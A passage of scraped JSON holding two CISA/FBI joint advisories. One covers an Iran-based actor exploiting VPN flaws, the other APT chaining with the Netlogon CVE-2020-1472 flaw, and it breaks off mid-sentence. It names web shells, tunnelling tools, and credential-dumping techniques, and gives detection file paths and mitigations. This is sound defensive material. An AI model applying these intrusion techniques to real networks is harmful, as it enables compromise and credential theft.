Protocol (LDAP) directory browser; as well as web shells known as ChunkyTuna, Tiny, and China Chopper.\n\nTable 1 illustrates some of the common tools this threat actor has used.\n\n_Table 1: Common exploit tools_\n\nTool\n\n| \n\nDetail \n \n---|--- \n \nChunkyTuna web shell\n\n| ChunkyTuna allows for chunked transfer encoding hypertext transfer protocol (HTTP) that tunnels Transmission Control Protocol (TCP) streams over HTTP. The web shell allows for reverse connections to a server with the intent to exfiltrate data. \n \nTiny web shell\n\n| Tiny uses Hypertext Preprocessor (PHP) to create a backdoor. It has the capability to allow a threat actor remote access to the system and can also tunnel or route traffic. \n \nChina Chopper web shell\n\n| China Chopper is a web shell hosted on a web server and is mainly used for web application attacks; it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \nFRPC | FRPC is a modified version of the open-source FRP tool. It allows a system\u2014inside a router or firewall providing Network Address Translation\u2014to provide network access to systems/operators located outside of the victim network. In this case, FRPC was used as reverse proxy, tunneling Remote Desktop Protocol (RDP) over Transport Layer Security (TLS), giving the threat actor primary persistence. \nChisel | Chisel is a fast TCP tunnel over HTTP and secured via Secure Shell (SSH). It is a single executable that includes both client and server. The tool is useful for passing through firewalls, but it can also be used to provide a secure form of communication to an endpoint on a victim network. \nngrok | ngrok is a tool used to expose a local port to the internet. Optionally, tunnels can be secured with TLS. \nNmap | Nmap is used for vulnerability scanning and network discovery. \nAngry IP Scanner | Angry IP Scanner is a scanner that can ping a range of Internet Protocol (IP) addresses to check if they are active and can also resolve hostnames, scan ports, etc. \nDrupwn | Drupwn is a Python-based tool used to scan for vulnerabilities and exploit CVEs in Drupal devices. \n \nNotable means of detecting this threat actor:\n\n * CISA and the FBI note that this group makes significant use of ngrok, which may appear as TCP port 443 connections to external cloud-based infrastructure.\n * The threat actor uses FRPC over port 7557.\n * [Malware Analysis Report MAR-10297887-1.v1](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a>) details some of the tools this threat actor used against some victims.\n\nThe following file paths can be used to detect Tiny web shell, ChunkyTuna web shell, or Chisel if a network has been compromised by this attacker exploiting CVE-2019-19781.\n\n * Tiny web shell\n\n` /netscaler/ns_gui/admin_ui/rdx/core/css/images/css.php \n/netscaler/ns_gui/vpn/images/vpn_ns_gui.php \n/var/vpn/themes/imgs/tiny.php`\n\n * ChunkyTuna web shell\n\n` /var/vpn/themes/imgs/debug.php \n/var/vpn/themes/imgs/include.php \n/var/vpn/themes/imgs/whatfile`\n\n * Chisel\n\n` /var/nstmp/chisel`\n\n### MITRE ATT&CK Framework\n\n#### Initial Access\n\nAs indicated in table 2, the threat actor primarily gained initial access by using the publicly available exploit for CVE-2019-19781. From there, the threat actor used the Citrix environment to establish a presence on an internal network server.\n\n_Table 2: Initial access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1190](<https://attack.mitre.org/techniques/T1190/>)\n\n| Exploit Public-Facing Application | The threat actor primarily gained initial access by compromising a Citrix NetScaler remote access server using a publicly available exploit for CVE-2019-19781. The threat actor also exploited CVE-2019-11510, CVE-2019-11539, and CVE-2020-5902. \n \n#### Execution\n\nAfter gaining initial access, the threat actor began executing scripts, as shown in table 3.\n\n_Table 3: Execution techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1059.001](<https://attack.mitre.org/techniques/T1059/001/>)\n\n| Command and Scripting Interpreter: PowerShell | A PowerShell script (`keethief` and `kee.ps1`) was used to access KeePass data. \n \n[T1059.003](<https://attack.mitre.org/techniques/T1059/003/>)\n\n| Command and Scripting Interpreter: Windows Command Shell | `cmd.exe` was launched via sticky keys that was likely used as a password changing mechanism. \n \n#### Persistence\n\nCISA observed the threat actor using the techniques identified in table 4 to establish persistence.\n\n_Table 4: Persistence techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1053.003](<https://attack.mitre.org/techniques/T1053/003/>)\n\n| Scheduled Task/Job: Cron | The threat actor loaded a series of scripts to `cron` and ran them for various purposes (mainly to access NetScaler web forms). \n \n[T1053.005](<https://attack.mitre.org/techniques/T1053/005/>)\n\n| Scheduled Task/Job: Scheduled Task | The threat actor installed and used FRPC (`frpc.exe`) on both NetScaler and internal devices. The task was named `lpupdate` and the binary was named `svchost`, which was the reverse proxy. The threat actor executed this command daily. \n \n[T1505.003](<https://attack.mitre.org/techniques/T1505/003/>)\n\n| Server Software Component: Web Shell | The threat actor used several web shells on existing web servers. Both NetScaler and web servers called out for ChunkyTuna. \n \n[T1546.008](<https://attack.mitre.org/techniques/T1546/008/>)\n\n| Event Triggered Execution: Accessibility Features | The threat actor used sticky keys (`sethc.exe`) to launch `cmd.exe`. \n \n#### Privilege Escalation\n\nCISA observed no evidence of direct privilege escalation. The threat actor attained domain administrator credentials on the NetScaler device via exploit and continued to expand credential access on the network.\n\n#### Defense Evasion\n\nCISA observed the threat actor using the techniques identified in table 5 to evade detection.\n\n_Table 5: Defensive evasion techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1027.002](<https://attack.mitre.org/techniques/T1027/002/>)\n\n| Obfuscated Files or Information: Software Packing | The threat actor used base64 encoding for payloads on NetScaler during initial access, making the pre-compiled payloads easier to avoid detection. \n \n[T1027.004](<https://attack.mitre.org/techniques/T1036/004/>)\n\n| Obfuscated Files or Information: Compile After Delivery | The threat actor used base64 encoding schemes on distributed (uncompiled) scripts and files to avoid detection. \n \n[T1036.004](<https://attack.mitre.org/techniques/T1245/>)\n\n| Masquerading: Masquerade Task or Service | The threat actor used FRPC (`frpc.exe`) daily as reverse proxy, tunneling RDP over TLS. The FRPC (`frpc.exe`) task name was `lpupdate` and ran out of Input Method Editor (IME) directory. In other events, the threat actor has been observed hiding activity via ngrok. \n \n[T1036.005](<https://attack.mitre.org/techniques/T1036/005/>)\n\n| Masquerading: Match Legitimate Name or Location | The FRPC (`frpc.exe`) binary name was `svchost`, and the configuration file was `dllhost.dll`, attempting to masquerade as a legitimate Dynamic Link Library. \n \n[T1070.004](<https://attack.mitre.org/techniques/T1070/004/>)\n\n| Indicator Removal on Host: File Deletion | To minimize their footprint, the threat actor ran `./httpd-nscache_clean` every 30 minutes, which cleaned up files on the NetScaler device. \n \n#### Credential Access\n\nCISA observed the threat actor using the techniques identified in table 6 to further their credential access.\n\n_Table 6: Credential access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/techniques/T1003/001/>)\n\n| OS Credential Dumping: LSASS Memory | The threat actor used `procdump` to dump process memory from the Local Security Authority Subsystem Service (LSASS). \n \n[T1003.003](<https://attack.mitre.org/techniques/T1003/003/>)\n\n| OS Credential Dumping: Windows NT Directory Services (NTDS) | The threat actor used Volume Shadow Copy to access credential information from the NTDS file. \n \n[T1552.001](<https://attack.mitre.org/techniques/T1552/001/>)\n\n| Unsecured Credentials: Credentials in Files | The threat actor accessed files containing valid credentials. \n \n[T1555](<https://attack.mitre.org/techniques/T1555/>)\n\n| Credentials from Password Stores | The threat actor accessed a `KeePass` database multiple times and used `kee.ps1` PowerShell script. \n \n[T1558](<https://attack.mitre.org/techniques/T1558/>)\n\n| Steal or Forge Kerberos Tickets | The threat actor conducted a directory traversal attack by creating files and exfiltrating a Kerberos ticket on a NetScaler device. The threat actor was then able to gain access to a domain account. \n \n#### Discovery\n\nCISA observed the threat actor using the techniques identified in table 7 to learn more about the victim environments.\n\n_Table 7: Discovery techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1018](<https://attack.mitre.org/techniques/T1018/>)\n\n| Remote System Discovery | The threat actor used Angry IP Scanner to detect remote systems. \n \n[T1083](<https://attack.mitre.org/techniques/T1083/>)\n\n| File and Directory Discovery | The threat actor used WizTree to obtain network files and directory listings. \n \n[T1087](<https://attack.mitre.org/techniques/T1087/>)\n\n| Account Discovery | The threat actor accessed `ntuser.dat` and `UserClass.dat` and used Softerra LDAP Browser to browse documentation for service accounts. \n \n[T1217](<https://attack.mitre.org/techniques/T1217/>)\n\n| Browser Bookmark Discovery | The threat actor used Google Chrome bookmarks to find internal resources and assets. \n \n#### Lateral Movement\n\nCISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment.\n\n_Table 8: Lateral movement techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1021](<https://attack.mitre.org/techniques/T1021/>)\n\n| Remote Services | The threat actor used RDP with valid account credentials for lateral movement in the environment. \n \n[T1021.001](<https://attack.mitre.org/techniques/T1021/001/>)\n\n| Remote Services: Remote Desktop Protocol | The threat actor used RDP to log in and then conduct lateral movement. \n \n[T1021.002](<https://attack.mitre.org/techniques/T1021/002/>)\n\n| Remote Services: SMB/Windows Admin Shares | The threat actor used PsExec. and PSEXECSVC pervasively on several hosts. The threat actor was also observed using a valid account to access SMB shares. \n \n[T1021.004](<https://attack.mitre.org/techniques/T1021/004/>)\n\n| Remote Services: SSH | The threat actor used Plink and PuTTY for lateral movement. Artifacts of Plink were used for encrypted sessions in the system registry hive. \n \n[T1021.005](<https://attack.mitre.org/techniques/T1021/005/>)\n\n| Remote Services: Virtual Network Computing (VNC) | The threat actor installed TightVNC server and client pervasively on compromised servers and endpoints in the network environment as lateral movement tool. \n \n[T1563.002](<https://attack.mitre.org/techniques/T1563/002/>)\n\n| Remote Service Session Hijacking: RDP Hijacking | The threat actor likely hijacked a legitimate RDP session to move laterally within the network environment. \n \n#### Collection\n\nCISA observed the threat actor using the techniques identified in table 9 for collection within the victim environment.\n\n_Table 9: Collection techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1005](<https://attack.mitre.org/techniques/T1005/>)\n\n| Data from Local System | The threat actor searched local system sources to accessed sensitive documents. \n \n[T1039](<https://attack.mitre.org/techniques/T1039/>)\n\n| Data from Network Shared Drive | The threat actor searched network shares to access sensitive documents. \n \n[T1213](<https://attack.mitre.org/techniques/T1213/>)\n\n| Data from Information Repositories | The threat actor accessed victim security/IT monitoring environments, Microsoft Teams, etc., to mine valuable information. \n \n[T1530](<https://attack.mitre.org/techniques/T1530/>)\n\n| Data from Cloud Storage Object | The threat actor obtained files from the victim cloud storage instances. \n \n[T1560.001](<https://attack.mitre.org/techniques/T1560/001/>)\n\n| Archive Collected Data: Archive via Utility | The threat actor used 7-Zip to archive data. \n \n#### Command and Control\n\nCISA observed the threat actor using the techniques identified in table 10 for command and control (C2).\n\n_Table 10: Command and control techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1071.001](<https://attack.mitre.org/techniques/T1071/001/>)\n\n| Application Layer Protocol: Web Protocols | The threat actor used various web mechanisms and protocols, including the web shells listed in table 1. \n \n[T1105](<https://attack.mitre.org/techniques/T1105/>)\n\n| Ingress Tool Transfer | The threat actor downloaded tools such as PsExec directly to endpoints and downloaded web shells and scripts to NetScaler in base64-encoded schemes. \n \n[T1572](<https://attack.mitre.org/techniques/T1572/>)\n\n| Protocol Tunneling | The threat actor used `FRPC.exe` to tunnel RDP over port 443. The threat actor has also been observed using ngrok for tunneling. \n \n#### Exfiltration\n\nCISA currently has no evidence of data exfiltration from this threat actor but assesses that it was likely due to the use of 7-Zip and viewing of sensitive documents.\n\n### Mitigations\n\n#### Recommendations\n\nCISA and FBI recommend implementing the following recommendations.\n\n * If your organization has not patched for the Citrix CVE-2019-19781 vulnerability, and a compromise is suspected, follow the recommendations in CISA Alert [AA20-031A](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>).\n * This threat actor has been observed targeting other CVEs mentioned in this report; follow the recommendations in the CISA resources provided below.\n * If using Windows Active Directory and compromise is suspected, conduct remediation of the compromised Windows Active Directory forest. \n * If compromised, rebuild/reimage compromised NetScaler devices.\n * Routinely audit configuration and patch management programs.\n * Monitor network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP).\n * Implement multi-factor authentication, especially for privileged accounts.\n * Use separate administrative accounts on separate administration workstations.\n * Implement the principle of least privilege on data access.\n * Secure RDP and other remote access solutions using multifactor authentication and \u201cjump boxes\u201d for access.\n * Deploy endpoint defense tools on all endpoints; ensure they work and are up to date.\n * Keep software up to date.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:%20CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:%20Central@cisa.dhs.gov>).\n\n### Resources\n\n[CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>) \n[CISA Alert AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>) \n[CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>) \n[CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>) \n[CISA Security Tip: Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>)\n\n### Revisions\n\nSeptember 15, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T12:00:00", "type": "ics", "title": "Iran-Based Threat Actor Exploits VPN Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-11539", "CVE-2019-19781", "CVE-2020-5902"], "modified": "2020-09-15T12:00:00", "id": "AA20-259A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-259a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T17:29:50", "description": "### Summary\n\n_This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\n**Note:** the analysis in this joint cybersecurity advisory is ongoing, and the information provided should not be considered comprehensive. The Cybersecurity and Infrastructure Security Agency (CISA) will update this advisory as new information is available.\n\nThis joint cybersecurity advisory was written by CISA with contributions from the Federal Bureau of Investigation (FBI). \n\nCISA has recently observed advanced persistent threat (APT) actors exploiting multiple legacy vulnerabilities in combination with a newer privilege escalation vulnerability\u2014[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)\u2014in Windows Netlogon. The commonly used tactic, known as vulnerability chaining, exploits multiple vulnerabilities in the course of a single intrusion to compromise a network or application. \n\nThis recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal, and territorial (SLTT) government networks. Although it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.\n\nCISA is aware of some instances where this activity resulted in unauthorized access to elections support systems; however, CISA has no evidence to date that integrity of elections data has been compromised. There are steps that election officials, their supporting SLTT IT staff, and vendors can take to help defend against this malicious cyber activity.\n\nSome common tactics, techniques, and procedures (TTPs) used by APT actors include leveraging legacy network access and virtual private network (VPN) vulnerabilities in association with the recent critical [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon vulnerability. CISA is aware of multiple cases where the Fortinet FortiOS Secure Socket Layer (SSL) VPN vulnerability [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) has been exploited to gain access to networks. To a lesser extent, CISA has also observed threat actors exploiting the MobileIron vulnerability [CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>). While these exploits have been observed recently, this activity is ongoing and still unfolding.\n\nAfter gaining initial access, the actors exploit [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) to compromise all Active Directory (AD) identity services. Actors have then been observed using legitimate remote access tools, such as VPN and Remote Desktop Protocol (RDP), to access the environment with the compromised credentials. Observed activity targets multiple sectors and is not limited to SLTT entities.\n\nCISA recommends network staff and administrators review internet-facing infrastructure for these and similar vulnerabilities that have or could be exploited to a similar effect, including Juniper [CVE-2020-1631](<https://nvd.nist.gov/vuln/detail/CVE-2020-1631>), Pulse Secure [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), Citrix NetScaler [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and Palo Alto Networks [CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>) (this list is not considered exhaustive).\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n### Initial Access\n\nAPT threat actors are actively leveraging legacy vulnerabilities in internet-facing infrastructure (_Exploit Public-Facing Application_ [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190/>)], _External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133/>)]) to gain initial access into systems. The APT actors appear to have predominately gained initial access via the Fortinet FortiOS VPN vulnerability [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>).\n\nAlthough not observed in this campaign, other vulnerabilities, listed below, could be used to gain network access (as analysis is evolving, these listed vulnerabilities should not be considered comprehensive). As a best practice, it is critical to patch all known vulnerabilities within internet-facing infrastructure.\n\n * Citrix NetScaler [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n * MobileIron [CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)\n * Pulse Secure [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n * Palo Alto Networks [CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)\n * F5 BIG-IP [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n\n#### Fortinet FortiOS SSL VPN CVE-2018-13379\n\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) is a path traversal vulnerability in the FortiOS SSL VPN web portal. An unauthenticated attacker could exploit this vulnerability to download FortiOS system files through specially crafted HTTP resource requests.[[1](<https://www.fortiguard.com/psirt/FG-IR-18-384>)]\n\n### MobileIron Core & Connector Vulnerability CVE-2020-15505\n\n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) is a remote code execution vulnerability in MobileIron Core & Connector versions 10.3 and earlier.[[2](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)] This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.\n\n### Privilege Escalation\n\nPost initial access, the APT actors use multiple techniques to expand access to the environment. The actors are leveraging [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) in Windows Netlogon to escalate privileges and obtain access to Windows AD servers. Actors are also leveraging the opensource tools such as Mimikatz and the CrackMapExec tool to obtain valid account credentials from AD servers (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078/>)]).\n\n#### Microsoft Netlogon Remote Protocol Vulnerability: CVE-2020-1472\n\n[CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) is a vulnerability in Microsoft Windows Netlogon Remote Protocol (MS-NRPC), a core authentication component of Active Directory.[[3](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)] This vulnerability could allow an unauthenticated attacker with network access to a domain controller to completely compromise all AD identity services (_Valid Accounts: Domain Accounts_ [[T1078.002](<https://attack.mitre.org/versions/v7/techniques/T1078/002/>)]). Malicious actors can leverage this vulnerability to compromise other devices on the network (_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v7/tactics/TA0008/>)]).\n\n### Persistence\n\nOnce system access has been achieved, the APT actors use abuse of legitimate credentials (_Valid Accounts _[[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078/>)]) to log in via VPN or remote access services _(External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133/>)]) to maintain persistence.\n\n### Mitigations\n\nOrganizations with externally facing infrastructure devices that have the vulnerabilities listed in this joint cybersecurity advisory, or other vulnerabilities, should move forward with an \u201cassume breach\u201d mentality. As initial exploitation and escalation may be the only observable exploitation activity, most mitigations will need to focus on more traditional network hygiene and user management activities.\n\n### Keep Systems Up to Date\n\nPatch systems and equipment promptly and diligently. Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. See table 1 for patch information on CVEs mentioned in this report.\n\n_Table 1: Patch information for CVEs_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | \n\n * FortiOS 6.0: 6.0.0 to 6.0.4\n * FortiOS 5.6: 5.6.3 to 5.6.7\n * FortiOS 5.4: 5.4.6 to 5.4.12\n| \n\n * [Fortinet Security Advisory: FG-IR-18-384](<https://www.fortiguard.com/psirt/FG-IR-18-384>) \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | \n\n * Citrix Application Delivery Controller\n * Citrix Gateway\n * Citrix SDWAN WANOP\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 ](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) | \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) | \n\n * MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0 \n * Sentry versions 9.7.2 and earlier, and 9.8.0; \n * Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier\n| \n\n * [MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>) \n[CVE-2020-1631](<https://nvd.nist.gov/vuln/detail/CVE-2020-1631>) | \n\n * Junos OS 12.3, 12.3X48, 14.1X53, 15.1, 15.1X49, 15.1X53, 17.2, 17.3, 17.4, 18.1, 18.2, 18.3, 18.4, 19.1, 19.2, 19.3, 19.4, 20.1\n| \n\n * [Juniper Security Advisory JSA11021](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11021>) \n[CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>) | \n\n * PAN-OS 9.1 versions earlier than PAN-OS 9.1.3; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15, and all versions of PAN-OS 8.0 (EOL)\n| \n\n * [Palo Alto Networks Security Advisory for CVE-2020-2021](<https://security.paloaltonetworks.com/CVE-2020-2021>) \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2016\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) \n \n### Comprehensive Account Resets\n\nIf there is an observation of [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon activity or other indications of valid credential abuse detected, it should be assumed the APT actors have compromised AD administrative accounts, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through \u201ccreative destruction,\u201d wherein as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed on on-premise as well as Azure-hosted AD instances.\n\nNote that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.\n\nIt is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.\n\n 1. Create a temporary administrator account, and use this account only for all administrative actions\n 2. Reset the Kerberos Ticket Granting Ticket (`krbtgt`) password [[4](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)]; this must be completed before any additional actions (a second reset will take place in step 5)\n 3. Wait for the krbtgt reset to propagate to all domain controllers (time may vary)\n 4. Reset all account passwords (passwords should be 15 characters or more and randomly assigned): \n\n 1. User accounts (forced reset with no legacy password reuse)\n 2. Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])\n 3. Service accounts\n 4. Directory Services Restore Mode (DSRM) account\n 5. Domain Controller machine account\n 6. Application passwords\n 5. Reset the `krbtgt` password again\n 6. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary)\n 7. Reboot domain controllers\n 8. Reboot all endpoints\n\nThe following accounts should be reset:\n\n * AD Kerberos Authentication Master (2x)\n * All Active Directory Accounts\n * All Active Directory Admin Accounts\n * All Active Directory Service Accounts\n * All Active Directory User Accounts\n * DSRM Account on Domain Controllers\n * Non-AD Privileged Application Accounts\n * Non-AD Unprivileged Application Accounts\n * Non-Windows Privileged Accounts\n * Non-Windows User Accounts\n * Windows Computer Accounts\n * Windows Local Admin\n\n### CVE-2020-1472\n\nTo secure your organization\u2019s Netlogon channel connections:\n\n * **Update all Domain Controllers and Read Only Domain Controllers**. On August 11, 2020, Microsoft released [software updates](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) to mitigate CVE-2020-1472. Applying this update to domain controllers is currently the only mitigation to this vulnerability (aside from removing affected domain controllers from the network).\n * **Monitor for new events, and address non-compliant devices** that are using vulnerable Netlogon secure channel connections.\n * **Block public access to potentially vulnerable ports**, such as 445 (Server Message Block [SMB]) and 135 (Remote Procedure Call [RPC]).\n\nTo protect your organization against this CVE, follow [advice from Microsoft](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>), including:\n\n * Update your domain controllers with an update released August 11, 2020, or later.\n * Find which devices are making vulnerable connections by monitoring event logs.\n * Address non-compliant devices making vulnerable connections.\n * Enable enforcement mode to address 